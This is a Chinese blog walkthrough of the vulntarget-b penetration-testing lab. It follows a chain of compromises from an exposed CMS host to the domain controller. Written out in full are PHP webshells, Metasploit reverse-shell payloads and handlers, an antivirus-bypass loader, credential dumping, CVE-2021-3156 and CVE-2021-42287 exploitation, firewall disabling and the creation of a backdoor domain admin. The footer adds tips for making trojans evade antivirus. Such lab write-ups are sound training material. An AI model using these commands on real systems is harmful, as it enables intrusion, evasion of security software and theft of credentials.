vulntarget-b 免杀火绒,多层域控内网靶场

置顶 已于 2024-01-03 11:06:26 修改
阅读量1.1k 收藏 16
点赞数 31
文章标签: 火绒安全 网络安全 web安全 网络攻击模型 linux 网络协议
于 2023-12-31 22:42:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/135320397
版权

目录

靶场环境测试

1.获取外网centos7权限

1.1.信息收集

1.2.getshell

1.3.msf上线

1.4.权限提升

1.4.1.os信息收集

1.4.2.sudo提权

2.获取win10权限

2.1.信息收集

2.2.开启代理

2.3.收集可使用的nday

2.2.getshell

2.3.上线msf

2.3.1.免杀火绒

2.3.2.权限提升

3.获取域控权限

3.1.信息收集

3.2.使用CVE-2021-42287

3.3.远程登陆

3.3.1.添加用户

3.3.2.修改注册表

3.3.3.kali开启远程桌面

靶场环境:

 

f47bc76d4fdfcdff8392e842a7054acc.png

项目地址: https://github.com/crow821/vulntarget

涉及知识点:极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278

kali攻击机 ip:192.168.127.129

centos7 ip:192.168.127.131

靶场环境测试

centos7外网网卡进行修改

cd /etc/sysconfig/network-scripts 
vi ifcfg-ens33

修改成dhcp模式即可,可以参照我下面的图片设置:

 

5cca0688babfe670ccab65e01cafd265.png

1.获取外网centos7权限

1.1.信息收集

nmap -sT -Pn 192.168.127.131

 

d07433e0010d6bb563beb6444a48d043.png

80端口没有找到可利用的东西,888显示403 forbidden,8888是宝塔的登陆面板,这里找到一个81端口,为极致cms搭建的站点。

 

ec44227c0381686f58fcbb5024f407e2.png

点击登陆无反应

 

db598cf26d0530629940b312ad9a6a40.png

端口扫描是否有可利用的信息:

python dirpro.py -u http://192.168.127.131:81/

 

26ff6fa45bca7cd0948432b32a782015.png

发现有一个admin.php的页面,访问发现是一个后台管理系统。

 

0e1fe01df8ed9999eece059aa1240f61.png

尝试使用弱口令进行登陆,登陆成功

账号:admin
密码:admin123

 

7523a0e17cf46647b3cc8a17b5da7072.png

进入后台功能点很多,这里查看历史存在的nday,找到了两个,都是利用插件的方式。

1.2.getshell

在插件这儿下载一个插件试试:

 

eeb57ea35edcc37a4b7f7aa7dead6928.png

查看数据包,有三个数据包值得留意:

数据包一:下载准备

 

d0831d5025b023e8773e86e49f31fc99.png

数据包二:下载文件

 

e6a3ef13e07dee3a816dea56c37299ba.png

数据包三:解压缩安装包

 

0bf84c8b58bb9c3daf0fceb7b6776543.png

如上的url可控,我们可以修改url地址为攻击机服务器上的后门。这里我们可以在kali上开启一个web服务。

echo "<?php eval($_POST['nanmu']);?>" > shell.php
zip shell.zip shell
python3 -m http.server

 

1985f6d7b6160d7d2c8bfa31ac5864a3.png

以下修改url要进行很多步,原因是一次最多传1024个字节,我自己一直改了十几次

 

1c7fb3902e12941affc027ebe7055373.png

 

60a57de501d5cb70f16e159be1b54708.png

 

d549dd7931c3d726eef64c217a64db6f.png

写入成功了,我们如何找到写入webshell的路径呢。我们查看安装说明,看到一个路径,/A/exts/

 

207228ef24cc204d874d2527f2e4c575.png

推测路径为:“http://192.168.127.131:81/A/exts/shell.php”,尝试连接,连接成功。

 

f483391dc97be90b0da9cd0695a4e36a.png

但是执行命令发现,无法执行命令,可能存在 disable_function,这里使用蚁剑插件可以绕过(下载插件需要科学上网)。

 

8cb05777440ee34bacbbeb8ed82a9fad.png

 

9d659618c8e1739cf89aa0cbc9ce58ba.png

 

78377bf2dd4e90c338ee12b0ae6a02bb.png

这时候就可以发现能够执行命令了:

 

85ea743d47199effbb73d938c094c328.png

这里还有另一种方式getshell(更简单):这里不过多赘述。

记某CMS漏洞getshell_苹果cmsgetshell-CSDN博客

1.3.msf上线

这里我们将权限转移到msf上,上传一个木马到centos7上即可。

这里设置的是反向连接。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.0.0.3 lport=4444 -f elf >shell.elf

 

0c77f3f969a10d382e9133566cdef43a.png

将生成的shell.elf上传至目标主机,并赋予可执行权限:

chmod +x shell.elf

 

d9c3653c2a1f70821864499a743067f4.png

 

feec2a98a4c5edf19c678ce0aa2ce9b8.png

kali设置监听:

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 4444
exploit

 

58d922e7b1f9d0140513e6849d6d8934.png

1.4.权限提升

得到一个权限较低的权限,先尝试权限提升。

 

3f832e3cdc4727a84e3e54b23306d59a.png

进入shell会话,发现存在python环境,创建一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

 

7d38cca9766cd3d2896f9d0ca5d374a1.png

1.4.1.os信息收集

先上传一个探针进行探测

项目地址:https://github.com/mzet-/linux-exploit-suggester

赋予可执行权限:

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

 

f3f38495087643b2e140d2efde3bcc8f.png

 

c7e90dd47c08c4933f782aa6701561d3.png

可以看到存在脏牛(没有gcc,无法实现)等提权漏洞。

感兴趣的朋友可以看看我写的这篇脏牛提权教程:

Linux脏牛(CVE-2016-5195)提权保姆级教程_脏牛提权-CSDN博客

可以用CVE-2021-3156(sudo提权),还有一个CVE-2021-4034(pkexec),我们这里使用sudo提权。

1.4.2.sudo提权

bg
search CVE-2021-3156
use 0
set target 12 
set session 1 
run

 

9ca8941b7da482a7f81d92ec6c12360f.png

 

440a4efc1700396506dc08ae65ea78aa.png

提权成功,可以看到我们创建了一个名为msf的管理员用户,密码为fjidggrhylxdeva,要是没有生成交互式shell,可以ssh远程登录,然后找到刚才我们生成的shell.elf,运行即可获得管理员权限。

2.获取win10权限

2.1.信息收集

查看ip地址,发现除了192.168.127.131之外还有一个10.0.20.30

 

ea64f800c6bfa7c2e05c2de5bdcca0f0.png

添加路由:

run autoroute -s 10.0.20.0/24
run autoroute -p

 

3c2f9a2dc8fb63700f80a74dee9cfc21.png

use auxiliary/scanner/portscan/tcp
set rhosts 10.0.20.0/24
set ports 22,23,80,135,139,445,1433,3389,8080
set threads 30
run

 

a6a6a5a5ca93504b49336927d7107043.png

发现10.0.20.66主机,开放了8080端口。

2.2.开启代理

开启代理(上一篇博客讲述了如何配置代理):

use auxiliary/server/socks_proxy
run
jobs

 

cf4e82f2346afb7af23de43d7945be0b.png

这里我们使用本机进行连接,代理端口默认为1080

 

ab48737fd8c6b3edafe35b9b8db3c209.png

访问http:10.0.20.66:8080,发现是禅道的登陆框。

2.3.收集可使用的nday

 

990b6b4edc42891dbced1909a0a40fe8.png

检查版本:http://10.0.20.66:8080/index.php?mode=getconfig发现是12.4.2的版本。

 

21e75468dba5133052f1eaf75d474ccf.png

搜索对应的nday,发现存在getshell的漏洞,进行尝试。

 

b06fafded8a7fd1ff764191f955d3478.png

首先需要登陆进后台

这里尝试使用burpsuit进行爆破,发现存在js加密。

 

30edbf839fd7aca1e8045b1e7558fdcb.png

js逆向花费时间太多,这里推荐一个工具,不需要解密js。使用方式也和burpsuit的方式一样(这里输入次数有限制,寄啦!)

GitHub - gubeihc/blasting

 

5876f8f6329464df285513cfebe78f03.png

不过最后还是获取了账号密码:

admin Admin123

2.2.getshell

首先我们需要在centos7上开启一个临时的web服务并写下一个后门(让win10远程下载)。

bg
sessions
sessions -i 2
shell
python -c "import pty;pty.spawn('/bin/bash')"
echo "<?php @eval(\$_REQUEST['x']);?>" > 2.php

 

18d78a75328a1d5abff0bfb1579461ec.png

开启web服务

python -m SimpleHTTPServer 4455

 

35670bf526c23fd1c39c3621236d6cde.png

之后访问:http://10.0.20.66:8080/index.php/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6NTU2Ni8xLnBocA==

 

e0a99059086a17115325eb4deb428804.png

 

69de8f6bf4e56e75d5d00e8f8e5dd30d.png

路径在/data/client/1/1.php

这里我又尝试了几个免杀webshell,防止被杀....

注意设置为GBK编码,不然页面会出现乱码。

 

ba34a36691c7880e0c494c28d67f84cd.png

2.3.上线msf

2.3.1.免杀火绒

获取到一个较低的权限,将会话转移到msf中,在此之前,先看看有什么杀软。

tasklist

 

94f051502a53251ad8ae4db4abc73aca.png

将所有信息复制,然后粘贴到: 杀软在线查询 ,该项目会自动检测目标主机存在什么杀软。

 

889cf2c4f068cf61ec848f8bb6a2e960.png

可以看到有一个火绒,寻找可以绕过火绒的方法。

这里需要下载一个加载器:

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=3333 -f hex -o shell.hex

 

f29b296e3420382b03b414a8c051b766.png

将该文件以及加载器都上传到win10中。

 

c31509b283f8240391aec32d8f69f63f.png

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.30
set lport 3333
run
gsl64.exe -f shell.hex -hex

 

894be847ef1ebec06a687c0d6ccc5dd2.png

 

58e0df7744e7aef57880034579256098.png

2.3.2.权限提升

发现是一个较低权限,但是输入getsystem也能获得管理员权限,这里还可以使用Microsoft Windows10 本地提权漏洞(CVE-2021-1732)

 

481575f1ee2068dc5361f22b7f12a99e.png

休眠和关闭防火墙:

shell
chcp 65001
powercfg -h off
netsh firewall set opmode mode=disable

 

3a8ddc26287fd91bf55bd5d92feee60e.png

3.获取域控权限

3.1.信息收集

ipconfig /all

 

0b68d7af05be4d998f952fe1c992abb5.png

查找域控ip:

nslookup WIN-UH20PRD3EAO.vulntarget.com

 

cfe780242aa080c92d93cec516e678fe.png

域控ip为10.0.10.100

load kiwi
creds_all

 

be42488276248ac58ddbc5788aa100f0.png

hashdump

 

63dfcdd47d9924ca232f5d143cd722e6.png

hash解密得到密码为admin#123

添加路由:

run autoroute -s 10.0.10.1/24
run autoroute -p

 

d0750ac76e0e2048dda94b5b39b9d1fd.png

3.2.使用CVE-2021-42287

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

git clone https://github.com/WazeHell/sam-the-admin.git

下载sam脚本后需要修改一下源码:

sudo vi sam_the_admin.py

 

a80054773e84ef84262b66de71cb1bda.png

需要添加“-codec gbk”,否者会出现乱码导致命令结果无法查看。

proxychains4 python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

 

a9fc25dcda78843f2e660d53d23f9725.png

可以看到我们已经控制了域控,且权限为system。

3.3.远程登陆

3.3.1.添加用户

net user nanmu1 WSAD@520 /add /domain

 

3174c4bd31735ec61dc3ffcd45f535e0.png

net group"Domain Admins" nanmu1 /add /domain

 

4286c180223c4c167b2bacb321ca479c.png

3.3.2.修改注册表

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f 
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

 

0cea6fe60ab7cd94b8cece5d91023239.png

3.3.3.kali开启远程桌面

proxychains remmina

 

6d9b211225fcdafd58cea37c0a4af7e0.png

成功获取域控

 

028e16d8f48a4d063bb6c3d288474e65.png

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

B10SS0MS
关注
  • 31
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
靶场-vulntarget-b
weixin_58602402的博客
06-21 388
2.开始后台GetShell,点击扩展管理–>插件列表–>找到在线编辑模板–>下载–>安装–>配置–>输入账户密码–>点击立即提交–>跳转到在线文件管理工具–>登录即可-----》失败,没有加载出插件来。6.通过执行上面的命令收集而来的信息,发现其是域内的低权限主机,在MSF上生成正向木马加壳免杀后通过蚁剑上传运行,注意需要将靶机上的防火墙关闭后才能反弹shell成功。1.访问以下地址可获取该CMS的版本,在网络上搜索该版本禅道CMS系统的漏洞,发现存在CNVD-C-2020-121325漏洞,直接复现!
Vulntarget-b
weixin_44339234的博客
12-22 497
vulutarget系列
vulntarget-b
m0_46105229的博客
04-25 2514
文章目录前言一、centerOS71.扫描IP2.扫描服务3.漏洞利用二、win10域环境1.扫描IP2.漏洞利用三、域控Windows server2016总结 前言 靶场vulntarget-b,环境可以自己百度下载 拓扑图: 一、centerOS7 1.扫描IP nmap -F 192.168.252.3-254 2.扫描服务 sudo nmap -sV -p 21-10000 192.168.252.151 浏览器访问http://192.168.252.151:81/,发现是一个极
靶场实战】vulntarget-b漏洞靶场实战
最新发布
TT小子的博客
06-20 1272
vulntarget-b漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
VulnTarget-b
大熊
06-16 419
实验目标:拿下域控中的flag.txt学习目标:极致CMS相关漏洞/禅道CMS相关漏洞/隧道代理/免杀/CVE-2021-1732/CVE-2021-42287/CVE-2021-42278靶机下载:其中vulntarget-b为本次实验机器》》》靶机信息《《《
强力删除配套--------火绒
05-09
标题中的“强力删除配套--------火绒”指的是火绒安全软件提供的强力删除功能,这是一款针对计算机安全的专业工具,尤其在处理顽固病毒、恶意软件或难以正常卸载的程序方面表现出色。火绒安全软件以其小巧轻便、高效...
sysdiag-full-火绒杀病毒工具
05-12
火绒杀病毒工具
65.远控免杀专题(65)-shellcode免杀实践1
08-03
网络安全Web安全专题——免杀技术解析】 在网络安全领域,免杀技术是黑客和安全研究人员用来规避反病毒软件检测的重要手段。本文主要探讨的是如何通过不同的方法实现shellcode(一段可以直接由CPU执行的机器码...
sysdiag-full-4.0.84.1火绒
04-01
sysdiag-full-4.0.84.1火绒,,欢迎同胞们使劲下载,如果可以评论,您可随时评论或与我沟通。
用python制作免杀软件教程及工具.zip
07-26
在IT安全领域,免杀软件是指能够绕过安全软件检测的恶意程序,通常用于渗透测试或防御演练。本文将基于提供的资源,详细讲解如何利用Python来制作免杀软件,以及涉及的相关知识点。 首先,"py2exe-0.6.9.win32-py...
qq安全登陆器绿色免杀
02-27
一个防止QQ被盗的最好武器,该工具采用不可逆的加密方式对QQ密码进行加密,然后以加密的方式传给腾讯服务器
免杀花指令生成器(不错的免杀工具)
03-31
汇编语言其实就是机器指令的符号化,从某种程度上看,它只是更容易理解一点的机器指令而已。每一条汇编语句,在汇编时,都会根据cpu特定的指令符号表将汇编指令翻译成二进制代码。而日常应用中,我们通过VC的IDE或其它如OD等反汇编、反编译软件也可以将一个二进制程序反汇编成汇编代码。机器的一般格式为:指令+数据。而反汇编的大致过程是:首先会确定指令开始的首地址,然后根据这个指令字判断是哪个汇编语句,然后再将后面的数据反汇编出来。由此,我们可以看到,在这一步的反汇编过程中存在漏洞:如果有人故意将错误的机器指令放在了错误的位置,那反汇编时,就有可能连同后面的数据一起错误地反汇编出来,这样,我们看到的就可能是一个错误的反汇编代码。这就是“花指令”,简而言之,花指令是利用了反汇编时单纯根据机器指令字来决定反汇编结果的漏洞。
vulntarget-b wp
shajianlong666的博客
07-02 231
内网靶场电脑配置一定要好,不然就太痛苦了(这个靶场是我目前打过比较难的了)
vulntarget漏洞靶场-vulntarget-b
aming小老弟
07-19 3210
vuln靶场
vulntarget】系列:vulntarget-b 练习WP
一只爱吃橙子的羊
07-12 940
vulntarget靶场系列,vulntarget-b 练习WP,会持续更新……
vulntarget-b免杀上线
qq_59873505的博客
01-29 139
11111
Powershell 过火绒免杀上线
春日野穹
01-10 5202
引言 拿到一台位于阿里云主机的shell,为IIS权限需要上线cs提权,主机自带阿里云盾和Windows Defender、且安装了火绒,为方便后续操作,需要进一步提权。 powershell免杀制作 payload生成 原生payload生成后被无情秒杀 powershell免杀制作 打开powershell命令行,将payload编码 1.新建一个变量h,用来接收之后编码的payload $h= '' 2.把FromBase64String放入变量$k中 $k=[System.Convert]
kali木马免杀火绒
10-07
k木马免杀火绒是指在kali系统中使用火绒进行木马免杀的操作。火绒是一款知名的安全防护软件,可以帮助检测和阻止恶意软件的运行。然而,针对火绒免杀技术是不断发展和变化的,所以具体的免杀方法可能会有所不同。在使用kali进行木马免杀时,您可以尝试以下方法: 1. 使用加壳工具:加壳工具可以将木马程序进行加密和混淆,从而绕过火绒的检测。您可以使用工具如shelter来对木马程序进行加壳操作,以增加木马的免杀能力。 2. 修改木马特征:火绒通常会根据木马程序的特征进行识别和拦截,所以您可以修改木马的特征,使其不易被火绒检测到。例如,您可以修改木马的关键函数或变量名称,或者使用代码混淆技术来增加木马的免杀能力。 3. 使用免杀工具:kali系统中有一些专门用于木马免杀的工具,您可以尝试使用这些工具来生成免杀的木马程序。例如,您可以使用powerstager等工具来生成免杀的木马,然后再进行火绒的测试。 总之,木马免杀是一个不断演进和变化的领域,没有绝对的免杀方法。在进行免杀操作时,建议您时刻关注最新的免杀技术和工具,并保持对火绒等防护软件的了解,以提高木马的免杀能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值